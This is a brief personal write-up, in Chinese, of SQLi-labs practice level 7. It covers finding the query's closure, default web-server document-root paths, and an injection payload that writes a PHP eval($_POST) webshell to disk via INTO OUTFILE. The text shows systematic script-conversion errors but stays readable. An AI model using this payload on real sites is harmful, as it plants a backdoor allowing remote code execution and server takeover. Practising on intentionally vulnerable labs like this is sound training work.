sqli(7)

前言

第7關 導出文件GET字符型注入

步驟OK，可是就是不能寫入文件，不知是文件夾的問題仍是本身操做的問題。可是確實，沒有導入成功。

1. 查看閉合，看源碼，發現閉合是（（‘ ’））；

 

 

 2.查看所在位置：

@@datadir 讀取數據庫路徑
@@basedir MYSQL 獲取安裝路徑

可是在less7中，沒有輸出信息，因此咱們只能盲打：

winserver的iis默認路徑是c:/inetpub/wwwroot/，PHPstudy的是F:\phpStudy\PHPTutorial\WWW

linux的nginx通常是/usr/local/nginx/html，/home/wwwroot/default，/usr/share/nginx，/var/www/htm等，

apache 就/var/www/htm，/var/www/html/htdocs

 3.使用into outfile寫入一句話木馬，而後鏈接就好了。 

?id=1')) union select 1,2,'<?php @eval($_POST["cmd"]);?>' into outfile "路徑\\間隔"--+

 

4.我搭建的物理機，因此沒有嘗試連菜刀。還有個問題就是不能寫入文件，修改了文件夾屬性也不行。但願後面幾關能夠幫助我解開疑惑。